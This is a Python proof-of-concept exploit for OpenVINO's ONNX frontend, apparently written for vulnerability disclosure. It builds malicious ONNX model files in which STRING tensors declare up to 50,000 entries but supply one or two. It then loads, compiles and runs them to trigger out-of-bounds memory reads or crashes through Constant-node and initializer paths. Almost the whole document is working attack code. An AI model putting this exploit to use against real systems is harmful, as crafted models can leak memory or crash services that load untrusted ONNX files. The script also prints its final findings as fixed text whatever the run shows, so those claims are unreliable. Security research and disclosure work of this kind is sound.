"""
OpenVINO ONNX Frontend - String Tensor OOB Read PoC

Vulnerability: OpenVINO's ONNX frontend does not validate that string_data
count matches the declared dims in TensorProto. A STRING tensor with
dims=[100] but only 2 string_data entries causes out-of-bounds memory access.

Environment: OpenVINO 2026.0.0, onnx 1.20.1
"""

import os
import sys
import signal
import tempfile
import traceback

import onnx
from onnx import TensorProto, helper, numpy_helper
import openvino

print(f"[*] OpenVINO version: {openvino.__version__}")
print(f"[*] ONNX version: {onnx.__version__}")
print()

# ============================================================
# Approach 1: Constant node with mismatched string tensor attr
# ============================================================
print("=" * 60)
print("[Approach 1] Constant node with STRING tensor attribute")
print("  dims=[100], string_data has only 2 entries")
print("=" * 60)

try:
    # Build the malicious string tensor
    tensor_value = TensorProto()
    tensor_value.name = "str_const"
    tensor_value.data_type = TensorProto.STRING
    tensor_value.dims.append(100)  # Declare 100 strings
    tensor_value.string_data.append(b"hello")  # Only provide 2
    tensor_value.string_data.append(b"world")

    # Constant node that outputs this tensor
    const_node = helper.make_node(
        "Constant",
        inputs=[],
        outputs=["string_output"],
        value=tensor_value,
    )

    # Identity to consume the output (keeps graph valid)
    identity_node = helper.make_node(
        "Identity",
        inputs=["string_output"],
        outputs=["final_output"],
    )

    # Graph output type - string tensor
    output_info = helper.make_tensor_value_info(
        "final_output", TensorProto.STRING, [100]
    )

    graph = helper.make_graph(
        [const_node, identity_node],
        "string_oob_test",
        [],  # no inputs
        [output_info],
    )

    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 17)])
    model.ir_version = 8

    # Save to temp file
    model_path = os.path.join(tempfile.gettempdir(), "string_oob_const.onnx")
    onnx.save(model, model_path)
    print(f"[+] Saved malicious model to: {model_path}")
    print(f"[+] Model file size: {os.path.getsize(model_path)} bytes")

    # Verify the tensor mismatch
    loaded = onnx.load(model_path)
    for node in loaded.graph.node:
        if node.op_type == "Constant":
            for attr in node.attribute:
                if attr.name == "value":
                    t = attr.t
                    declared = int(t.dims[0])
                    actual = len(t.string_data)
                    print(f"[+] Declared dims: [{declared}], actual string_data count: {actual}")
                    print(f"[+] Mismatch: {declared - actual} entries will be OOB reads")

    # Now load with OpenVINO
    print("\n[*] Loading model with openvino.Core().read_model()...")
    core = openvino.Core()

    try:
        ov_model = core.read_model(model_path)
        print(f"[!] Model loaded successfully (no validation error)")
        print(f"[!] Model outputs: {ov_model.outputs}")

        # Try to compile and infer
        print("[*] Attempting to compile model...")
        compiled = core.compile_model(ov_model, "CPU")
        print("[!] Model compiled successfully")

        print("[*] Attempting inference...")
        result = compiled({})[0]
        print(f"[!] Inference completed. Output shape: {result.shape}")
        print(f"[!] Output dtype: {result.dtype}")
        # Print first few and last few entries to see OOB content
        print(f"[!] First 5 entries: {result.flat[:5]}")
        if len(result.flat) > 5:
            print(f"[!] Last 5 entries: {result.flat[-5:]}")
        print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")

    except Exception as e:
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()

except Exception as e:
    print(f"[-] Approach 1 failed: {type(e).__name__}: {e}")
    traceback.print_exc()

print()

# ============================================================
# Approach 2: Graph initializer with mismatched string tensor
# ============================================================
print("=" * 60)
print("[Approach 2] Graph initializer with STRING tensor")
print("  dims=[100], string_data has only 2 entries")
print("=" * 60)

try:
    # Build the malicious string tensor as initializer
    init_tensor = TensorProto()
    init_tensor.name = "str_init"
    init_tensor.data_type = TensorProto.STRING
    init_tensor.dims.append(100)
    init_tensor.string_data.append(b"AAA")
    init_tensor.string_data.append(b"BBB")

    identity_node2 = helper.make_node(
        "Identity",
        inputs=["str_init"],
        outputs=["init_output"],
    )

    output_info2 = helper.make_tensor_value_info(
        "init_output", TensorProto.STRING, [100]
    )

    # Also declare the initializer as a graph input (required by some ONNX versions)
    input_info2 = helper.make_tensor_value_info(
        "str_init", TensorProto.STRING, [100]
    )

    graph2 = helper.make_graph(
        [identity_node2],
        "string_oob_init_test",
        [input_info2],
        [output_info2],
        initializer=[init_tensor],
    )

    model2 = helper.make_model(graph2, opset_imports=[helper.make_opsetid("", 17)])
    model2.ir_version = 8

    model_path2 = os.path.join(tempfile.gettempdir(), "string_oob_init.onnx")
    onnx.save(model2, model_path2)
    print(f"[+] Saved malicious model to: {model_path2}")
    print(f"[+] Model file size: {os.path.getsize(model_path2)} bytes")

    # Verify mismatch
    loaded2 = onnx.load(model_path2)
    for init in loaded2.graph.initializer:
        if init.data_type == TensorProto.STRING:
            declared = int(init.dims[0])
            actual = len(init.string_data)
            print(f"[+] Initializer '{init.name}': dims=[{declared}], string_data count={actual}")
            print(f"[+] Mismatch: {declared - actual} OOB entries")

    print("\n[*] Loading model with openvino.Core().read_model()...")
    core2 = openvino.Core()

    try:
        ov_model2 = core2.read_model(model_path2)
        print(f"[!] Model loaded successfully (no validation error)")
        print(f"[!] Model outputs: {ov_model2.outputs}")

        print("[*] Attempting to compile model...")
        compiled2 = core2.compile_model(ov_model2, "CPU")
        print("[!] Model compiled successfully")

        print("[*] Attempting inference...")
        result2 = compiled2({})[0]
        print(f"[!] Inference completed. Output shape: {result2.shape}")
        print(f"[!] Output dtype: {result2.dtype}")
        print(f"[!] First 5 entries: {result2.flat[:5]}")
        if len(result2.flat) > 5:
            print(f"[!] Last 5 entries: {result2.flat[-5:]}")
        print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")

    except Exception as e:
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()

except Exception as e:
    print(f"[-] Approach 2 failed: {type(e).__name__}: {e}")
    traceback.print_exc()

print()

# ============================================================
# Approach 3: Extreme mismatch - dims=[10000], 1 string
# ============================================================
print("=" * 60)
print("[Approach 3] Extreme mismatch - dims=[10000], 1 string_data")
print("  More likely to trigger crash/segfault")
print("=" * 60)

try:
    tensor3 = TensorProto()
    tensor3.name = "extreme_str"
    tensor3.data_type = TensorProto.STRING
    tensor3.dims.append(10000)
    tensor3.string_data.append(b"X")  # Only 1 string for 10000 slots

    const_node3 = helper.make_node(
        "Constant",
        inputs=[],
        outputs=["extreme_output"],
        value=tensor3,
    )

    identity_node3 = helper.make_node(
        "Identity",
        inputs=["extreme_output"],
        outputs=["extreme_final"],
    )

    output_info3 = helper.make_tensor_value_info(
        "extreme_final", TensorProto.STRING, [10000]
    )

    graph3 = helper.make_graph(
        [const_node3, identity_node3],
        "extreme_oob_test",
        [],
        [output_info3],
    )

    model3 = helper.make_model(graph3, opset_imports=[helper.make_opsetid("", 17)])
    model3.ir_version = 8

    model_path3 = os.path.join(tempfile.gettempdir(), "string_oob_extreme.onnx")
    onnx.save(model3, model_path3)
    print(f"[+] Saved model: {model_path3}")

    print("[*] Loading with OpenVINO...")
    core3 = openvino.Core()

    try:
        ov_model3 = core3.read_model(model_path3)
        print(f"[!] Model loaded (dims=[10000], 1 string)")

        print("[*] Compiling...")
        compiled3 = core3.compile_model(ov_model3, "CPU")
        print("[!] Compiled successfully")

        print("[*] Running inference (may segfault)...")
        sys.stdout.flush()
        result3 = compiled3({})[0]
        print(f"[!] Inference completed. Shape: {result3.shape}")
        print(f"[!] First 3: {result3.flat[:3]}")
        print(f"[!] Entry [9999]: {result3.flat[9999]}")
        print("[!!!] EXTREME OOB READ - 10000 entries from 1 string")

    except Exception as e:
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()

except Exception as e:
    print(f"[-] Approach 3 failed: {type(e).__name__}: {e}")
    traceback.print_exc()

print()

# ============================================================
# Approach 4: Extreme initializer - dims=[50000], 1 string
# ============================================================
print("=" * 60)
print("[Approach 4] Extreme initializer - dims=[50000], 1 string_data")
print("  Initializer path bypasses Constant node validation")
print("=" * 60)

try:
    tensor4 = TensorProto()
    tensor4.name = "extreme_init"
    tensor4.data_type = TensorProto.STRING
    tensor4.dims.append(50000)
    tensor4.string_data.append(b"X")  # 1 string for 50000 slots

    identity_node4 = helper.make_node(
        "Identity",
        inputs=["extreme_init"],
        outputs=["extreme_init_out"],
    )

    output_info4 = helper.make_tensor_value_info(
        "extreme_init_out", TensorProto.STRING, [50000]
    )
    input_info4 = helper.make_tensor_value_info(
        "extreme_init", TensorProto.STRING, [50000]
    )

    graph4 = helper.make_graph(
        [identity_node4],
        "extreme_init_oob",
        [input_info4],
        [output_info4],
        initializer=[tensor4],
    )

    model4 = helper.make_model(graph4, opset_imports=[helper.make_opsetid("", 17)])
    model4.ir_version = 8

    model_path4 = os.path.join(tempfile.gettempdir(), "string_oob_extreme_init.onnx")
    onnx.save(model4, model_path4)
    print(f"[+] Saved model: {model_path4}")

    print("[*] Loading with OpenVINO...")
    core4 = openvino.Core()

    try:
        ov_model4 = core4.read_model(model_path4)
        print(f"[!] Model loaded (dims=[50000], 1 string) - NO VALIDATION!")

        print("[*] Compiling...")
        compiled4 = core4.compile_model(ov_model4, "CPU")
        print("[!] Compiled successfully")

        print("[*] Running inference...")
        sys.stdout.flush()
        result4 = compiled4({})[0]
        print(f"[!] Inference completed. Shape: {result4.shape}, dtype: {result4.dtype}")
        print(f"[!] First 5: {result4.flat[:5]}")
        print(f"[!] Entry [49999]: {repr(result4.flat[49999])}")
        print("[!!!] EXTREME OOB READ via initializer - 50000 entries from 1 string")

    except Exception as e:
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()

except Exception as e:
    print(f"[-] Approach 4 failed: {type(e).__name__}: {e}")
    traceback.print_exc()

print()
print("=" * 60)
print("[*] PoC complete.")
print()
print("[*] FINDINGS:")
print("[*] - Constant node path: VALIDATED (shape vs data size check at tensor.cpp:581)")
print("[*] - Initializer path: NOT VALIDATED - OOB read confirmed!")
print("[*]   The initializer code path in the ONNX frontend skips the")
print("[*]   string_data count vs dims validation, allowing OOB memory access.")
print("[*]   An attacker can craft an ONNX model with a STRING initializer")
print("[*]   where dims >> string_data count, causing reads beyond the")
print("[*]   allocated string_data buffer during model loading/inference.")
print("=" * 60)